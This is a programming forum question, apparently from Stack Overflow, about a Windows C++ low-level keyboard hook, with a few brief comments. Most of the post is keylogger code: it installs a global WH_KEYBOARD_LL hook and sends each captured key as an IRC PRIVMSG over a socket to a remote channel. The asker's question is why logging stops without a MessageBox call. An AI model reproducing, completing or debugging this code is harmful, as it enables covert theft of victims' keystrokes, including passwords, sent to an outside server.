# Reading Keys Through hooks

Tags: c++, logging, key, hook

I'm currently developing a program and was working on using hooks to read keys that are pressed and came upon a weird issue. The code below is the code I am using, and I'm wondering, why does the messageboxA() statement seem to end the log, but removing the statement makes the log not even work.

```
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);

    // If key is being pressed
    if (wParam == WM_KEYDOWN) {
        switch (p->vkCode) {

            // Invisible keys
            case VK_CAPITAL: IRC_Send(globSock, MSG_PRIVMSG, "<CAPLOCK>");  break;
            case VK_LCONTROL:   IRC_Send(globSock, MSG_PRIVMSG, "<LCTRL>"); break;
            case VK_RCONTROL:   IRC_Send(globSock, MSG_PRIVMSG, "<RCTRL>"); break;
            case VK_INSERT:     IRC_Send(globSock, MSG_PRIVMSG, "<INSERT>");    break;
            case VK_END:        IRC_Send(globSock, MSG_PRIVMSG, "<END>");   break;
            case VK_PRINT:      IRC_Send(globSock, MSG_PRIVMSG, "<PRINT>"); break;
            case VK_DELETE:     IRC_Send(globSock, MSG_PRIVMSG, "<DEL>");   break;
            case VK_BACK:       IRC_Send(globSock, MSG_PRIVMSG, "<BACKSPACE>"); break;

            case VK_SHIFT: IRC_Send(globSock, MSG_PRIVMSG, "<SHIFT>"); break;
            case VK_LEFT:       IRC_Send(globSock, MSG_PRIVMSG, "<LEFT>");  break;
            case VK_RIGHT:      IRC_Send(globSock, MSG_PRIVMSG, "<RIGHT>"); break;
            case VK_UP:         IRC_Send(globSock, MSG_PRIVMSG, "<UP>");    break;
            case VK_DOWN:       IRC_Send(globSock, MSG_PRIVMSG, "<DOWN>");  break;
            case 0x30: IRC_Send(globSock, MSG_PRIVMSG, "<0>"); break;   
            case 0x31: IRC_Send(globSock, MSG_PRIVMSG, "<1>"); break;
            case 0x32: IRC_Send(globSock, MSG_PRIVMSG, "<2>"); break;
            case 0x33: IRC_Send(globSock, MSG_PRIVMSG, "<3>"); break;
            case 0x34: IRC_Send(globSock, MSG_PRIVMSG, "<4>"); break;
            case 0x35: IRC_Send(globSock, MSG_PRIVMSG, "<5>"); break;
            case 0x36: IRC_Send(globSock, MSG_PRIVMSG, "<6>"); break;
            case 0x37: IRC_Send(globSock, MSG_PRIVMSG, "<7>"); break;
            case 0x38: IRC_Send(globSock, MSG_PRIVMSG, "<8>"); break;
            case 0x39: IRC_Send(globSock, MSG_PRIVMSG, "<9>"); break;
            case 0x41: IRC_Send(globSock, MSG_PRIVMSG, "<A>"); break;
            case 0x42: IRC_Send(globSock, MSG_PRIVMSG, "<B>"); break;
            case 0x43: IRC_Send(globSock, MSG_PRIVMSG, "<C>"); break;
            case 0x44: IRC_Send(globSock, MSG_PRIVMSG, "<D>"); break;
            case 0x45: IRC_Send(globSock, MSG_PRIVMSG, "<E>"); break;
            case 0x46: IRC_Send(globSock, MSG_PRIVMSG, "<F>"); break;
            case 0x47: IRC_Send(globSock, MSG_PRIVMSG, "<G>"); break;
            case 0x48: IRC_Send(globSock, MSG_PRIVMSG, "<H>"); break;
            case 0x49: IRC_Send(globSock, MSG_PRIVMSG, "<I>"); break;
            case 0x4A: IRC_Send(globSock, MSG_PRIVMSG, "<J>"); break;
            case 0x4B: IRC_Send(globSock, MSG_PRIVMSG, "<K>"); break;
            case 0x4C: IRC_Send(globSock, MSG_PRIVMSG, "<L>"); break;
            case 0x4D: IRC_Send(globSock, MSG_PRIVMSG, "<M>"); break;
            case 0x4E: IRC_Send(globSock, MSG_PRIVMSG, "<N>"); break;
            case 0x4F: IRC_Send(globSock, MSG_PRIVMSG, "<O>"); break;
            case 0x50: IRC_Send(globSock, MSG_PRIVMSG, "<P>"); break;
            case 0x51: IRC_Send(globSock, MSG_PRIVMSG, "<Q>"); break;
            case 0x52: IRC_Send(globSock, MSG_PRIVMSG, "<R>"); break;
            case 0x53: IRC_Send(globSock, MSG_PRIVMSG, "<S>"); break;
            case 0x54: IRC_Send(globSock, MSG_PRIVMSG, "<T>"); break;
            case 0x55: IRC_Send(globSock, MSG_PRIVMSG, "<U>"); break;
            case 0x56: IRC_Send(globSock, MSG_PRIVMSG, "<V>"); break;
            case 0x57: IRC_Send(globSock, MSG_PRIVMSG, "<W>"); break;
            case 0x58: IRC_Send(globSock, MSG_PRIVMSG, "<X>"); break;
            case 0x59: IRC_Send(globSock, MSG_PRIVMSG, "<Y>"); break;
            case 0x5A: IRC_Send(globSock, MSG_PRIVMSG, "<Z>"); break;

            // Visible keys
            //default:
            //  out << char(tolower(p->vkCode)); IRC_Send(globSock, MSG_PRIVMSG, char(tolower(p->vkCode))); break;
        }
    }

    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

BOOL EstablishHook()
{   

    unsigned long start = GetTickCount();
    HINSTANCE hMyInstance = GetModuleHandle(NULL);

        HHOOK keyboardHook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keyboardHookProc,
        hMyInstance,
        0);

    MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);
        return true;

}
```

Comment: Forgot to add the keyboardHookProc is another procedure above that handles and switches based on the PKBDLLHOOKSTRUCT vkcodes

Comment: keyboardHookProc is should be callback method, I thing so, Please provide more code.

Comment: I postedd the full code

Comment: it may me related to messages that getting from keyboard. Like when you are place the message box you will get all key board message that in loop to execute but when you remove it you will not get any thing ,Please referred GetMessage() and SendMessage() kind of thing..

Comment: but it's weird, why would the messagebox determine whether or not keys are read? I even put in a custom messagebox, one where you pass arguments to a function that creates one, and even then, if you remove the messagebox portion, it doesn't work.